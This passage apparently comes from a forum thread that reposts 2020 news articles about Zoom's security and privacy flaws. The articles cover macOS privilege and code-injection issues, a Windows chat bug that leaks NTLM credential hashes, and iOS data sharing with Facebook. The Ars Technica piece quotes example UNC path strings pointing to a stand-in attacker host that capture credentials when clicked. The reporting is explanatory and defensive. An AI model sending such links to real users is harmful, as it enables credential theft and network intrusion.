despite its marketing claims. Zoom did not return a request for comment from WIRED about how it is handling this deluge of security and privacy findings in its product. All of this compounds with the fact that even before the pandemic, Zoom had a reputation for prioritizing ease of use over security and privacy. Notably, a researcher revealed flaws last summer about how Zoom seamlessly joined users into call links and shared their camera feeds without an initial check to let users confirm they wanted to launch the app. That means attackers could have crafted Zoom links that instantly gave them access to a user's video feed—and everything going on around them—with one click. The research also built on previous Zoom vulnerability findings. Zoom's gaffes have also started to invite even more potentially consequential scrutiny. The company is facing a class action lawsuit over the data its iOS app sent to Facebook. And the office of New York attorney general Letitia James sent a letter to the company on Monday about its mounting punch list. "While Zoom has remediated specific reported security vulnerabilities, we would like to understand whether Zoom has undertaken a broader review of its security practices," the attorney general's office wrote. Given this track record and all the commotion about Zoom security in the last few weeks, macOS security researcher Patrick Wardle says he recently got interested in poking at the Mac desktop Zoom app. Today he is disclosing two new security flaws he found during that brief analysis. "Zoom, while great from a usability point of view, clearly hasn’t been designed with security in mind," Wardle says. "I saw some researchers tweeting about strange Zoom behavior and literally within 10 seconds of looking at it myself I was just like aw, man. Granted I research this stuff, so I know what to look for. But Zoom has just had so many missteps, and that’s very indicative of a product that has not been adequately audited from a security point of view." Wardle's findings pose limited risk to users in practice, because they would first require the presence of malware on a target device. One attack focuses on a Zoom installation flow that still relies on a now-retired application programming interface from Apple. The company deprecated the API because of security concerns, but Wardle says that he sometimes still sees products using it as a lazy workaround. An attacker who has infected a victim device with malware, but hasn't yet achieved full access, could exploit Zoom's insecure install settings to gain root privileges. The other vulnerability Wardle found is more significant, though still only a local access bug. macOS offers a feature called "hardened runtime" that lets the operating system act as a sort of bouncer while programs are running and prevent code injections or other manipulations that are typically malicious. Developers can choose to add exemptions for third-party plugins if they want to have that additional functionality from an external source, but Wardle notes that such exceptions are typically a last resort, because they undermine the whole premise of "hardened runtime." Yet Zoom's macOS application has such an exemption for third-party libraries, meaning malware running on a victim's system could inject code into Zoom that's trusted and essentially link the two applications—allowing the malware to piggyback on Zoom's legitimate microphone and video access and start listening in on a victim or watching through their webcam whenever the malware wants. Though it doesn't look like researchers will stop finding flaws in Zoom any time soon, the most important takeaway for regular users is simply to think carefully about their security and privacy needs for each call they make. Zoom's security is likely sufficient for most people's general communications, but there are more protected group video chat options—like those offered by WhatsApp, FaceTime, and particularly Signal—that could be a better fit for sensitive gatherings. "The reality is that companies are going to have mistakes in their software," says Jonathan Leitschuh, a security researcher who found the webcam hijacking flaws in Zoom last summer. "The more criticism of a platform, the more secure it’s hopefully going to be. So hopefully Zoom is taking the information that they’re gaining and actually acting on it. But if you need to be secure and secret I would not recommend you have those conversations over Zoom. Use a platform that’s built for the level of security you need." Source: The Zoom Privacy Backlash Is Only Getting Started (Wired)
  24. Attackers can use Zoom to steal users’ Windows credentials with no warning Zoom for Windows converts network locations into clickable links. What could go wrong? Enlarge Christopher Blizzard 44 with 32 posters participating Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said. Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises. Embed network location here Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as //attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link. Attackers can then use the credentials to access shared network resources, such as Outlook servers and storage devices. Typically, resources on a Windows network will accept the NTLM hash when authenticating a device. That leaves the networks open to so-called pass-the-hash attacks that don’t require a cracking technique to convert the hash to its corresponding plain-text password. “It’s quite a shortcoming from Zoom,” Matthew Hickey, cofounder of the security boutique Hacker House, told me. “It’s a very trivial bug. With more of us working from home now, it’s even easier to exploit that bug.” The vulnerability was first described last week by a researcher who uses the Twitter handle @_g0dmode. He wrote: “#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users. On Tuesday, Hickey expanded on the discovery. He showed in one tweet how the Zoom Windows client exposed the credentials that could be used to access restricted parts of a Windows network. “Hi @zoom_us & @NCSC,” Hickey wrote. “Here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted).” The screenshot shows the Windows username as Bluemoon/HackerFantastic. Immediately below, the NTLM hash appears, although Hickey redacted most of it in the image he posted. Attacks can be mounted by people posing as a legitimate meeting participant or during so-called Zoom bombing raids, in which trolls access a meeting not secured by a password and bombard everyone else with offensive or harassing images. Protect yourself While the attack works only against Windows users, Hickey said attacks can be launched using any form of Zoom, again, by sending targets a UNC location in a text message. When Windows users click on the link while they’re connected to certain unsecured machines or networks, the Zoom app will send the credentials over port 445, which is used to transmit traffic related to Windows SMB and Active Directory services. In the event that port 445 is closed to the Internet—either by a device or network firewall or through an ISP that blocks it—the attack won’t work. But it’s hardly a given that this egress will be closed on many Zoom users’ networks. The events of the past month have left millions of people working from home without the same levels of IT and security support they get when working on premises. That makes it more likely that port 445 is open, either because of an oversight or because the port is needed to connect to enterprise resources. Zoom representatives didn’t respond to an email sent on Tuesday seeking comment for this post. This post will be updated if a reply comes later. In the meantime, Windows users should be highly suspicious of chat messages that contain links in them. When possible, users should also ensure that port 445 is either blocked or can access only trusted addresses on the Internet. Source: Attackers can use Zoom to steal users’ Windows credentials with no warning (Ars Technica)
  25. Video calling app Zoom's iOS version is sharing user data with Facebook Even if you don't have a Facebook account (Image credit: Shutterstock) Zoom's video calling service has been available for a while now but the unprecedented number of people working from home during the coronavirus pandemic has skyrocketed the app's popularity. However, research conducted by Vice's tech branch, Motherboard, has revealed that Zoom's iOS app has been secretly sharing analytical data with Facebook, even if the user doesn't have an account on the social media platform. The data being shared includes time the app is launched, device and location information, phone carrier, and analytical data that can be used to create targeted ads. Too much information The reason Zoom is able to share user data with Facebook, even if there's no linked social media account, is because the video calling app uses Facebook's software development kits (SDKs). So, when Zoom is downloaded and launched, it immediately connects to the Facebook Graph API. This is not a new practice: developers have long used Facebook SDKs to add features to their apps, although Facebook's terms of use require app makers to inform users of these data sharing practices. While Zoom's privacy policy mentions that the app may collect data related to a user's Facebook profile which may then be shared with third parties – although Facebook is not explicitly mentioned as a third party – there's no clear indication it will be doing the same for users who do not have a Facebook account. Not the first time Zoom does have a history of privacy issues. In 2019, a security researcher unearthed a bug that allowed webcams of Zoom users to be hacked without their knowledge, although the company has said that the issue has been resolved. Other recent news related to video chat security involves a man exposing himself in front of children on a video call after he was able to "guess" the link to the call. While this was not on a Zoom call (instead on an app called Whereby), TechCrunch reported last year that it was possible to hijack a Zoom meeting by "cycling through different permutations of meeting IDs in bulk". This was possible as the meetings weren't protected by a passcode. The Electronic Frontier Foundation (EFF) recently explained how a host on a Zoom call can monitor the activities of participants while screen-sharing. If users record the video call, then Zoom administrators are able to "access the contents of that recorded call, including video, audio, transcript, and chat files, as well as access to sharing, analytics, and cloud management privileges". While the old security issues have since been resolved by Zoom, this new discovery highlights how simple technological solutions can sometimes come at the cost of privacy. Source: Video calling app Zoom's iOS version is sharing user data with Facebook (TechRadar)
  • Create New...